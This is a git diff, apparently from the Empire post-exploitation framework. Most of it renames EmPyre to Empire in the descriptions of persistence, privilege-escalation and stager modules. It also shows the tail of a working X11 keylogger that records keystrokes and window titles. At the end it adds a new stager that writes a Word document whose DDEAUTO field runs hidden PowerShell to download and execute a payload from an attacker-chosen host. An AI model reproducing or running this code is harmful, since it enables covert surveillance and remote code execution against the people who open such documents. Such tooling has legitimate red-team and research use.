buf.value is None: + root_return, parent_return, children_return, nchildren_return = (ct.byref(ct.c_ulong()), ct.pointer(ct.c_ulong()), ct.pointer(ct.c_ulong()), ct.c_uint()) + x11.XQueryTree(display, window, root_return, parent_return, children_return, ct.pointer(nchildren_return)) + x11.XGetWMName(display, parent_return.contents, ct.pointer(prop)) + return prop.value + + +def get_active_window_title(): + return get_window_title(get_active_window()) + +def append_key_buff(k): + if k: + window = get_active_window() + if str(append_key_buff.last_window) != str(window): + job_message_buffer("\\n%s: %s\\n"%(strftime("%d-%m-%Y %H:%M:%S"), \ + get_window_name(window))) + append_key_buff.last_window = window + job_message_buffer(k) + +append_key_buff.last_window = None + +def poll(callback, sleep_interval=.01): + while not stopped: + sleep(sleep_interval) + released, group, level = fetch_keys_poll() + callback(to_keysyms(released, group, level)) + +def xinput(callback): + if not xi: + raise NotAvailable() + + xi_opcode = ct.c_int() + xi_event = ct.c_int() + xi_error = ct.c_int() + + if not x11.XQueryExtension( + display, + 'XInputExtension', + ct.pointer(xi_opcode), ct.pointer(xi_event), ct.pointer(xi_error) + ): + return NotAvailable() + + root_win = x11.XDefaultRootWindow(display) + job_message_buffer(str(root_win)) + eventmask = XiEventMask() + eventmask.deviceid = 0 + eventmask.mask_len = XiMaxLen() + + mask = (ct.c_byte*eventmask.mask_len)() + XiSetMask(mask, 2) # KeyPress + eventmask.mask = ct.cast(ct.pointer(mask), ct.c_void_p) + xi.XISelectEvents(display, root_win, ct.cast(ct.pointer(eventmask), ct.c_void_p), 1) + x11.XMapWindow(display, root_win) + x11.XSync(display, 0) + while not stopped: + event = XEvent() + x11.XNextEvent(display, ct.pointer(event)) + x11.XGetEventData(display, ct.pointer(event.cookie)) + if event.cookie.type == 35 and event.cookie.extension == xi_opcode.value: + xievent = ct.cast(event.cookie.data, ct.POINTER(XIDeviceEvent)).contents + callback(to_keysyms( + [xievent.detail], + xievent.group.effective, + xievent.mods.effective + )) + + x11.XFreeEventData(display, ct.pointer(event.cookie)) + + x11.XDestroyWindow(display, root_win) + +def run(): + try: + xinput(append_key_buff) + except NotAvailable: + job_message_buffer("poll") + poll(append_key_buff) + except: + import traceback + job_message_buffer("Exception\\n"+traceback.format_exc()) + +def stop(): + stopped = True + +def dump(): + res = u''.join(buffer) + buffer = [] + return res + +def fetch_keys_poll(): + state = XkbState() + x11.XkbGetState(display, 0x0100, ct.pointer(state)) + + group = ord(state.group) + level = ord(state.locked_mods) & 1 + + keyboard = ct.c_buffer(32) + x11.XQueryKeymap(display, keyboard) + current = set() + + for byte, value in enumerate(keyboard): + value = ord(value) + if not value: + continue + + for bit in xrange(8): + if value & (1 << bit): + current.add(byte*8 + bit) + + released = set(x for x in state if not x in current and x) + + state = current + group, group = group, group + level, level = level, level + + return released, group, level + +def to_keysyms(released, group, level): + keys = set() + + for k in set(released): + # We incorrectly guess level here, but in 99% real life cases shift means level1 + # Also some things may not be available in group, so fallback to default one + ks = x11.XkbKeycodeToKeysym(display, k, group, level) + if not ks: + ks = x11.XkbKeycodeToKeysym(display, k, 0, level) + if not ks: + ks = x11.XkbKeycodeToKeysym(display, k, 0, 0) + + if ((ks >> 8) & 0xFF) == 0xFE or ks in (0xffe2, 0xffe3, 0xffe5, 0xffe6): + # Ignore group shifts and shift key info + continue + + uks = keysym_to_unicode(ks) + xk = keysym_to_XK(ks) + if xk: + keys.add(u'<{}>'.format(xk)) + elif uks: + keys.add(uks) + elif ks: + keys.add(u'{{{}}}'.format(ks)) + + return u''.join(keys) +run() + +job_message_buffer('[!] Keylogger exited\\n') + +""" + + return script diff --git a/lib/modules/python/management/multi/spawn.py b/lib/modules/python/management/multi/spawn.py index 2f05c46..6e29ecd 100644 --- a/lib/modules/python/management/multi/spawn.py +++ b/lib/modules/python/management/multi/spawn.py @@ -14,7 +14,7 @@ class Module: 'Author': ['@harmj0y'], # more verbose multi-line description of the module - 'Description': ('Spawns a new EmPyre agent.'), + 'Description': ('Spawns a new Empire agent.'), # True if the module needs to run in the background 'Background' : False, diff --git a/lib/modules/python/persistence/osx/CreateHijacker.py b/lib/modules/python/persistence/osx/CreateHijacker.py index 826e610..fa0c22c 100644 --- a/lib/modules/python/persistence/osx/CreateHijacker.py +++ b/lib/modules/python/persistence/osx/CreateHijacker.py @@ -12,7 +12,7 @@ class Module: 'Author': ['@patrickwardle,@xorrior'], # more verbose multi-line description of the module - 'Description': ('Configures and EmPyre dylib for use in a Dylib hijack, given the path to a legitimate dylib of a vulnerable application. The architecture of the dylib must match the target application. The configured dylib will be copied local to the hijackerPath'), + 'Description': ('Configures and Empire dylib for use in a Dylib hijack, given the path to a legitimate dylib of a vulnerable application. The architecture of the dylib must match the target application. The configured dylib will be copied local to the hijackerPath'), # True if the module needs to run in the background 'Background' : False, diff --git a/lib/modules/python/persistence/osx/RemoveDaemon.py b/lib/modules/python/persistence/osx/RemoveDaemon.py index 13b525f..0c05fe1 100644 --- a/lib/modules/python/persistence/osx/RemoveDaemon.py +++ b/lib/modules/python/persistence/osx/RemoveDaemon.py @@ -13,7 +13,7 @@ class Module: 'Author': ['@xorrior'], # more verbose multi-line description of the module - 'Description': ('Remove an EmPyre Launch Daemon.'), + 'Description': ('Remove an Empire Launch Daemon.'), # True if the module needs to run in the background 'Background' : False, diff --git a/lib/modules/python/persistence/osx/launchdaemonexecutable.py b/lib/modules/python/persistence/osx/launchdaemonexecutable.py index 46a4b07..8a80590 100644 --- a/lib/modules/python/persistence/osx/launchdaemonexecutable.py +++ b/lib/modules/python/persistence/osx/launchdaemonexecutable.py @@ -12,7 +12,7 @@ class Module: 'Author': ['@xorrior'], # more verbose multi-line description of the module - 'Description': ('Installs an EmPyre launchDaemon.'), + 'Description': ('Installs an Empire launchDaemon.'), # True if the module needs to run in the background 'Background' : False, @@ -67,7 +67,7 @@ class Module: 'Value' : 'com.proxy.initialize' }, 'DaemonLocation' : { - 'Description' : 'The full path of where the EmPyre launch daemon should be located.', + 'Description' : 'The full path of where the Empire launch daemon should be located.', 'Required' : True, 'Value' : '' } @@ -163,7 +163,7 @@ process = subprocess.Popen('launchctl load /Library/LaunchDaemons/%s', stdout=su process.communicate() print "\\n[+] Persistence has been installed: /Library/LaunchDaemons/%s" -print "\\n[+] EmPyre daemon has been written to %s" +print "\\n[+] Empire daemon has been written to %s" """ % (encBytes,plistSettings, programname, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, plistfilename, programname) diff --git a/lib/modules/python/persistence/osx/loginhook.py b/lib/modules/python/persistence/osx/loginhook.py index 0b3bd63..37c4755 100644 --- a/lib/modules/python/persistence/osx/loginhook.py +++ b/lib/modules/python/persistence/osx/loginhook.py @@ -11,7 +11,7 @@ class Module: 'Author': ['@Killswitch-GUI'], # more verbose multi-line description of the module - 'Description': ('Installs EmPyre agent via LoginHook.'), + 'Description': ('Installs Empire agent via LoginHook.'), # True if the module needs to run in the background 'Background' : False, diff --git a/lib/modules/python/privesc/multi/sudo_spawn.py b/lib/modules/python/privesc/multi/sudo_spawn.py index fbece19..d684ef4 100644 --- a/lib/modules/python/privesc/multi/sudo_spawn.py +++ b/lib/modules/python/privesc/multi/sudo_spawn.py @@ -14,7 +14,7 @@ class Module: 'Author': ['@harmj0y'], # more verbose multi-line description of the module - 'Description': ('Spawns a new EmPyre agent using sudo.'), + 'Description': ('Spawns a new Empire agent using sudo.'), # True if the module needs to run in the background 'Background' : False, diff --git a/lib/modules/python/privesc/osx/piggyback.py b/lib/modules/python/privesc/osx/piggyback.py index d71dcaf..4875269 100644 --- a/lib/modules/python/privesc/osx/piggyback.py +++ b/lib/modules/python/privesc/osx/piggyback.py @@ -14,7 +14,7 @@ class Module: 'Author': ['@n00py'], # more verbose multi-line description of the module - 'Description': ('Spawns a new EmPyre agent using an existing sudo session. This works up until El Capitan.'), + 'Description': ('Spawns a new Empire agent using an existing sudo session. This works up until El Capitan.'), # True if the module needs to run in the background 'Background' : False, diff --git a/lib/stagers/multi/bash.py b/lib/stagers/multi/bash.py index c3f5694..fba4a39 100644 --- a/lib/stagers/multi/bash.py +++ b/lib/stagers/multi/bash.py @@ -10,7 +10,7 @@ class Stager: 'Author': ['@harmj0y'], - 'Description': ('Generates self-deleting Bash script to execute the EmPyre stage0 launcher.'), + 'Description': ('Generates self-deleting Bash script to execute the Empire stage0 launcher.'), 'Comments': [ '' diff --git a/lib/stagers/multi/pyinstaller.py b/lib/stagers/multi/pyinstaller.py index 5175fbb..6f4b78b 100644 --- a/lib/stagers/multi/pyinstaller.py +++ b/lib/stagers/multi/pyinstaller.py @@ -1,17 +1,19 @@ from lib.common import helpers +import os """ Install steps... - install pyInstaller --- try: apt-get -y install python-pip && pip install pyinstaller +-- try: + - copy into stagers directory --- ./EmPyre/lib/stagers/ +-- ./Empire/lib/stagers/ -- kick off the emPyre agent on a remote target --- /tmp/emPyre & +- kick off the empire agent on a remote target +-- /tmp/empire & @TweekFawkes @@ -26,7 +28,7 @@ class Stager: 'Author': ['@TweekFawkes'], - 'Description': ('Generates an ELF binary payload launcher for EmPyre using pyInstaller.'), + 'Description': ('Generates an ELF binary payload launcher for Empire using pyInstaller.'), 'Comments': [ 'Needs to have pyInstaller setup on the system you are creating the stager on. For debian based operatins systems try the following command: apt-get -y install python-pip && pip install pyinstaller' @@ -42,21 +44,21 @@ class Stager: 'Required' : True, 'Value' : '' }, - 'Language' : { - 'Description' : 'Language of the stager to generate.', - 'Required' : True, - 'Value' : 'python' - }, + 'Language' : { + 'Description' : 'Language of the stager to generate.', + 'Required' : True, + 'Value' : 'python' + }, 'BinaryFile' : { 'Description' : 'File to output launcher to.', 'Required' : True, - 'Value' : '/tmp/emPyre' + 'Value' : '/tmp/empire' + }, + 'SafeChecks' : { + 'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.', + 'Required' : True, + 'Value' : 'True' }, - 'SafeChecks' : { - 'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.', - 'Required' : True, - 'Value' : 'True' - }, 'Base64' : { 'Description' : 'Switch. Base64 encode the output. Defaults to False.', 'Required' : True, @@ -112,21 +114,16 @@ class Stager: self.conn = self.mainMenu.conn # pull out the code install path from the database config cur = self.conn.cursor() - #cur.execute("SELECT install_path FROM config") - #installPath_Str = cur.fetchone()[0] + cur.close() - import os -#<<<<<<< HEAD:lib/stagers/osx/pyinstaller.py + stagerFFP_Str = self.mainMenu.installPath + "/data/agent/stagers/http.py" - #stagerFFP_Str = os.path.join(installPath_Str, "data/agent/stager.py") -#======= - stagerFFP_Str = os.path.join(installPath_Str, "data/agent/stagers/http.py") -#>>>>>>> ec606351797a9f97676a33767f38e341bd1e18bf:lib/stagers/multi/pyinstaller.py + stagerFFP_Str = os.path.join(self.mainMenu.installPath, "data/agent/stagers/http.py") + filesToExtractImportsFrom_List.append(stagerFFP_Str) agentFFP_Str = self.mainMenu.installPath + "/data/agent/agent.py" - #agentFFP_Str = os.path.join(installPath_Str, "data/agent/agent.py") filesToExtractImportsFrom_List.append(agentFFP_Str) imports_List = [] diff --git a/lib/stagers/osx/applescript.py b/lib/stagers/osx/applescript.py index 126c0cb..4c967df 100644 --- a/lib/stagers/osx/applescript.py +++ b/lib/stagers/osx/applescript.py @@ -10,7 +10,7 @@ class Stager: 'Author': ['@harmj0y'], - 'Description': ('Generates AppleScript to execute the EmPyre stage0 launcher.'), + 'Description': ('Generates AppleScript to execute the Empire stage0 launcher.'), 'Comments': [ '' diff --git a/lib/stagers/osx/application.py b/lib/stagers/osx/application.py index 3008251..dd64609 100644 --- a/lib/stagers/osx/application.py +++ b/lib/stagers/osx/application.py @@ -10,7 +10,7 @@ class Stager: 'Author': ['@xorrior'], - 'Description': ('Generates an EmPyre Application.'), + 'Description': ('Generates an Empire Application.'), 'Comments': [ '' @@ -42,7 +42,7 @@ class Stager: 'Value' : '' }, 'OutFile' : { - 'Description' : 'path to output EmPyre application. The application will be saved to a zip file.', + 'Description' : 'path to output Empire application. The application will be saved to a zip file.', 'Required' : True, 'Value' : '/tmp/out.zip' }, diff --git a/lib/stagers/osx/ducky.py b/lib/stagers/osx/ducky.py index 883d534..f4873b2 100755 --- a/lib/stagers/osx/ducky.py +++ b/lib/stagers/osx/ducky.py @@ -9,7 +9,7 @@ class Stager: 'Author': ['@xorrior'], - 'Description': ('Generates a ducky script that runs a one-liner stage0 launcher for EmPyre.'), + 'Description': ('Generates a ducky script that runs a one-liner stage0 launcher for Empire.'), 'Comments': [ '' diff --git a/lib/stagers/osx/launcher.py b/lib/stagers/osx/launcher.py index aca7f95..4b09157 100644 --- a/lib/stagers/osx/launcher.py +++ b/lib/stagers/osx/launcher.py @@ -10,7 +10,7 @@ class Stager: 'Author': ['@harmj0y'], - 'Description': ('Generates a one-liner stage0 launcher for EmPyre.'), + 'Description': ('Generates a one-liner stage0 launcher for Empire.'), 'Comments': [ '' diff --git a/lib/stagers/osx/pkg.py b/lib/stagers/osx/pkg.py index 7a5a2d7..910dc81 100644 --- a/lib/stagers/osx/pkg.py +++ b/lib/stagers/osx/pkg.py @@ -9,7 +9,7 @@ class Stager: 'Author': ['@xorrior'], - 'Description': ('Generates a pkg installer. The installer will copy a custom (empty) application to the /Applications folder. The postinstall script will execute an EmPyre launcher.'), + 'Description': ('Generates a pkg installer. The installer will copy a custom (empty) application to the /Applications folder. The postinstall script will execute an Empire launcher.'), 'Comments': [ '' diff --git a/lib/stagers/osx/safari_launcher.py b/lib/stagers/osx/safari_launcher.py index 9f16b63..f9ee215 100644 --- a/lib/stagers/osx/safari_launcher.py +++ b/lib/stagers/osx/safari_launcher.py @@ -10,7 +10,7 @@ class Stager: 'Author': ['@424f424f'], - 'Description': ('Generates an HTML payload launcher for EmPyre.'), + 'Description': ('Generates an HTML payload launcher for Empire.'), 'Comments': [ 'https://www.exploit-db.com/exploits/38535/' @@ -98,4 +98,4 @@ class Stager: }; """ % (launcher) - return html \ No newline at end of file + return html diff --git a/lib/stagers/osx/teensy.py b/lib/stagers/osx/teensy.py index 924bfb7..cc8ae05 100644 --- a/lib/stagers/osx/teensy.py +++ b/lib/stagers/osx/teensy.py @@ -10,7 +10,7 @@ class Stager: 'Author': ['Matt @matterpreter Hand'], - 'Description': ('Generates a Teensy script that runs a one-liner stage0 launcher for EmPyre.'), + 'Description': ('Generates a Teensy script that runs a one-liner stage0 launcher for Empire.'), 'Comments': [ '' @@ -116,7 +116,7 @@ class Stager: teensyCode += " Keyboard.send_now();\n" teensyCode += " clearKeys();\n" teensyCode += "}\n\n" - teensyCode += "void empyre(void) {\n" + teensyCode += "void empire(void) {\n" teensyCode += " delay(500);\n" teensyCode += " mac_minWindows();\n" teensyCode += " mac_minWindows();\n" @@ -132,7 +132,7 @@ class Stager: teensyCode += " Keyboard.println(\"exit\");\n" teensyCode += "}\n\n" teensyCode += "void setup(void) {\n" - teensyCode += " empyre();\n" + teensyCode += " empire();\n" teensyCode += "}\n\n" teensyCode += "void loop() {}" diff --git a/lib/stagers/windows/macroless_msword.py b/lib/stagers/windows/macroless_msword.py new file mode 100644 index 0000000..f40fe1c --- /dev/null +++ b/lib/stagers/windows/macroless_msword.py @@ -0,0 +1,171 @@ +# -*- coding: utf-8 -*- +from lib.common import helpers +import os + +class Stager: + + def __init__(self, mainMenu, params=[]): + + # metadata info about the module, not modified during runtime + self.info = { + 'Name': 'Macroless code execution in MSWord', + + 'Author': ['james fitts'], + + 'Description': ('Creates a macroless document utilizing a formula field for code execution'), + + 'Comments': ["Hard work by Etienne Stalmas and Saif El-Sherei"] + } + + # any options needed by the module, settable during runtime + self.options = { + # format: + # value_name : {description, required, default_value} + 'Listener' : { + 'Description' : 'Listener to use for the payload.', + 'Required' : True, + 'Value' : '' + }, + 'OutputPs1' : { + 'Description' : 'PS1 file to execute against the target.', + 'Required' : True, + 'Value' : 'default.ps1' + }, + 'OutputDocx' : { + 'Description' : 'MSOffice document name.', + 'Required' : True, + 'Value' : 'empire.docx' + }, + 'OutputPath' : { + 'Description' : 'Output path for the files.', + 'Required' : True, + 'Value' : '/tmp/' + }, + 'HostURL' : { + 'Description' : 'IP address to host the malicious ps1 file.', + 'Required' : True, + 'Value' : 'http://192.168.1.1:80' + } + } + + # save off a copy of the mainMenu object to access external functionality + # like listeners/agent handlers/etc. + self.mainMenu = mainMenu + + # During instantiation, any settable option parameters + # are passed as an object set to the module and the + # options dictionary is automatically set. This is mostly + # in case options are passed on the command line + if params: + for param in params: + # parameter format is [Name, Value] + option, value = param + if option in self.options: + self.options[option]['Value'] = value + + def generate(self, obfuscate=False, obfuscationCommand=""): + + listener = self.options['Listener']['Value'] + output_path = self.options['OutputPath']['Value'] + output_docx = self.options['OutputDocx']['Value'] + host = self.options['HostURL']['Value'] + ps1 = self.options['OutputPs1']['Value'] + + if not self.mainMenu.listeners.is_listener_valid(listener): + print helpers.color("[!] Invalid listener: " + listener) + return "" + else: + launcher = self.mainMenu.stagers.generate_launcher(listener, language='powershell', encode=True) + + def create_directory_structure(outdir): + os.makedirs(outdir + "_rels") + os.makedirs(outdir + "docProps") + os.makedirs(outdir + "word") + os.makedirs(outdir + "word/_rels") + os.makedirs(outdir + "word/theme") + + def create_files(outdir): + content_types = """ +""" + + f = open(outdir + "[Content_Types].xml", 'w') + f.write(content_types) + + hidden_rels = """ +""" + + f = open(outdir + "_rels/.rels", 'w') + f.write(hidden_rels) + + docProps_app = """ +211270Microsoft Office Word011falseTitle1false81falsefalse16.0000""" + + f = open(outdir + "docProps/app.xml", 'w') + f.write(docProps_app) + + docProps_core = """ +AdministratorAdministrator12017-10-11T12:49:00Z2017-10-11T12:51:00Z""" + + f = open(outdir + "docProps/core.xml", 'w') + f.write(docProps_core) + + word_rels = """ +""" + + f = open(outdir + "word/_rels/document.xml.rels", 'w') + f.write(word_rels) + + word_theme = """ +""" + + f = open(outdir + "word/theme/theme1.xml", 'w') + f.write(word_theme) + + font_table = """ +""" + + f = open(outdir + "word/fontTable.xml", 'w') + f.write(font_table) + + settings = """ +""" + + f = open(outdir + "word/settings.xml", 'w') + f.write(settings) + + styles = """ +""" + + f = open(outdir + "word/styles.xml", 'w') + f.write(styles) + + web_settings = """ +""" + + f = open(outdir + "word/webSettings.xml", 'w') + f.write(web_settings) + + def craft_exploit(outdir, url, pshell): + document = """ +DDEAUTO C:\\\\Windows\\\\System32\\\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('%s/%s');powershell -noP -sta -w 1 -enc $e "!Unexpected End of Formula""" % (url, pshell) + + f = open(outdir + "word/document.xml", 'w') + f.write(document) + + def craft_ps(outdir, pshell_blob, fname): + pshell_blob = pshell_blob.split("powershell -noP -sta -w 1 -enc ")[1] + f = open(outdir + fname, 'w') + f.write(pshell_blob) + + if output_path[-1] != "/": + output_path = output_path + "/" + + create_directory_structure(output_path) + create_files(output_path) + craft_ps(output_path, launcher, ps1) + craft_exploit(output_path, host, ps1) + + print helpers.color("[+] '%s' and '%s' was created in the '%s' directory" % (output_docx, ps1, output_path)) + + return os.system("cd %s && zip %s%s -r [Content_Types].xml docProps/ _rels word && rm -rf [Content_Types].xml docProps/ _rels/ word/ && cd -" % (output_path, output_path, output_docx)) +